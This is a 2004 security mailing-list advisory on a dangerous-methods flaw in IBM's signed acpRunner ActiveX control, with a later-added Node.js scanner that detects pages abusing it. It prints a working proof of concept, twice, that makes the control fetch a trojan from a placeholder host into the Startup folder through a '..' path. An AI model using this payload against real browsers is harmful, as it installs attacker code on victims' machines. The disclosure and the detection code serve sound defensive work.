Date: 17 Jun 2004 20:23:11 +0200
From: SecuriTeam <support@securiteam.com>
To: [email protected]
Subject: [NT] IBM acpRunner ActiveX Dangerous Methods Vulnerability
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
IBM acpRunner ActiveX Dangerous Methods Vulnerability
------------------------------------------------------------------------
SUMMARY
eEye Digital Security has discovered a security vulnerability in IBM's
signed "acpRunner" ActiveX control. Because the control is signed by IBM, a
web page can offer it for installation in IBM's name; users who trust IBM
will accept it, and their systems can then be compromised. IBM designed this
control for an automated support solution for its PCs, and an unknown number
of systems already have it installed.
The issue is quite simple. ActiveX is a very powerful web technology, and
that power can be abused: a control's designer can expose any function on
the user's computer to script. Microsoft's security model relies on trust,
and Microsoft warns against building controls with dangerous capabilities;
as in any trust model, the responsibility rests with the control's creator.
In this case, IBM's control exposes members such as "DownLoadURL",
"SaveFilePath", and "Download". Almost needless to say, these let a remote
attacker have a victim's system silently download a file of the attacker's
choosing into a location of the attacker's choosing. By downloading an
executable into the Startup folder, the attacker's executable is run
automatically at the next startup.
DETAILS
Vulnerable Systems:
* acpRunner ActiveX version 1.2.5.0
<object width="310" height="20"
  codebase="https://www-3.ibm.com/pc/support/access/aslibmain/content/AcpControl.cab"
  id="runner"
  classid="CLSID:E598AC61-4C6F-4F4D-877F-FAC49CA91FA3"
  data="DATA:application/x-oleobject;BASE64,YayY5W9MTU+Hf/rEnKkfowADAAAKIAAAEQIAAA==">
</object>
<script>
  // Where to fetch the file from, and a relative path (note the "..")
  // that resolves to the user's Startup folder.
  runner.DownLoadURL = "http://malicioussystem/trojan.exe";
  runner.SaveFilePath = "..\\Start Menu\\Programs\\Startup";
  runner.FileSize = 96857;
  runner.FileDate = "01/09/2004 3:33";
  // Performs the download; the file is written to SaveFilePath.
  runner.DownLoad();
</script>
In the above example, the control is instantiated with an "object" tag. The
browser uses the codebase attribute to install the control if it is not
already present on the system, which brings up the ActiveX prompt that
essentially asks the user whether they trust IBM. The object is given the id
"runner" so that script can reference it later and call its dangerous
members.
The script then accesses those members in a completely straightforward
manner. "SaveFilePath" is set to a relative path on the user's system that,
by way of "..", resolves to the user's Startup folder. Finally, "DownLoad" is
called, and a progress meter shows the Trojan file being downloaded into the
Startup folder. At the next startup, the OS automatically runs the Trojan.
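A triage check a practitioner might want, added here as an example and not part of the eEye advisory or of IBM's software: a Node.js scanner that flags HTML pages which embed the acpRunner CLSID and script the members named above. Only the CLSID and the member names are taken from the advisory; the sample pages, the scanPage function, its "exploit-like"/"present" verdicts and the traversal test are constructed for this example.

```javascript
// Added example, not code from the eEye advisory or from IBM: a Node.js
// triage scanner for HTML pages that instantiate the acpRunner control and
// script its download members. The CLSID and member names come from the
// advisory; the sample pages and the scoring rules are constructed here.

const ACP_RUNNER_CLSID = "E598AC61-4C6F-4F4D-877F-FAC49CA91FA3";

// Members named in the advisory. "DownLoad" is the one that performs the write.
const DANGEROUS_MEMBERS = ["DownLoadURL", "SaveFilePath", "DownLoad"];

const escapeRe = (s) => s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");

// Ids of <object> elements whose classid is the acpRunner CLSID.
// Objects without an id are reported as null (script cannot name them by id).
function findAcpRunnerObjects(html) {
  const ids = [];
  const objectRe = /<object\b([^>]*)>/gi;
  let m;
  while ((m = objectRe.exec(html)) !== null) {
    const attrs = m[1];
    const classid = /\bclassid\s*=\s*["']?clsid:([0-9a-f-]+)/i.exec(attrs);
    if (!classid || classid[1].toUpperCase() !== ACP_RUNNER_CLSID) continue;
    const id = /\bid\s*=\s*["']?([\w-]+)/i.exec(attrs);
    ids.push(id ? id[1] : null);
  }
  return ids;
}

// Concatenate the page's inline <script> bodies.
function inlineScript(html) {
  const bodies = [];
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) bodies.push(m[1]);
  return bodies.join("\n");
}

// One finding per acpRunner instance: which dangerous members the page's
// script touches, the literal SaveFilePath if one is assigned, whether that
// path climbs out of its directory with "..", and a coarse verdict.
function scanPage(html) {
  const code = inlineScript(html);
  return findAcpRunnerObjects(html).map((id) => {
    if (id === null) {
      return { id, members: [], savePath: null, traversal: false, verdict: "present" };
    }
    const ref = `\\b${escapeRe(id)}\\s*\\.\\s*`;
    const members = DANGEROUS_MEMBERS.filter((name) =>
      new RegExp(`${ref}${name}\\b`, "i").test(code)
    );
    const pathMatch = new RegExp(`${ref}SaveFilePath\\s*=\\s*(["'])(.*?)\\1`, "i").exec(code);
    const savePath = pathMatch ? pathMatch[2] : null;
    // A ".." path component with either separator, at start, middle or end.
    const traversal = savePath !== null && /(^|[\\/])\.\.([\\/]|$)/.test(savePath);
    const writes = members.includes("DownLoad") && members.length > 1;
    return { id, members, savePath, traversal, verdict: writes ? "exploit-like" : "present" };
  });
}

// Constructed sample: the advisory's proof of concept, lightly normalised.
const EXPLOIT_PAGE = String.raw`
<object width="310" height="20"
  codebase="https://www-3.ibm.com/pc/support/access/aslibmain/content/AcpControl.cab"
  id="runner" classid="CLSID:E598AC61-4C6F-4F4D-877F-FAC49CA91FA3">
</object>
<script>
  runner.DownLoadURL = "http://malicioussystem/trojan.exe";
  runner.SaveFilePath = "..\\Start Menu\\Programs\\Startup";
  runner.FileSize = 96857;
  runner.DownLoad();
</script>`;

// Constructed sample: the control is embedded but no script touches its
// download members (what a legitimate support page might look like).
const BENIGN_PAGE = `
<object id="runner" classid="clsid:e598ac61-4c6f-4f4d-877f-fac49ca91fa3"></object>
<script>document.title = "IBM support";</script>`;

console.log(JSON.stringify(scanPage(EXPLOIT_PAGE), null, 2));
```

This is a heuristic for proxy logs or web-page triage, not a security boundary: script can reach the same members through obfuscated property access (for instance `runner["Down" + "Load"]`) that these regular expressions will miss. The durable fix is IBM's patched control, or setting the ActiveX kill bit for the CLSID so that Internet Explorer refuses to instantiate the old version at all.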
Vendor Status:
IBM has released a patch for this vulnerability. The patch is available at
the following location:
http://www-306.ibm.com/pc/support/site.wss/document.do?lndocid=MIGR-51860
ADDITIONAL INFORMATION
The information has been provided by Drew Copley <dcopley@eEye.com>.
The original article can be found at:
http://www.eeye.com/html/research/advisories/AD20040615A.html
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.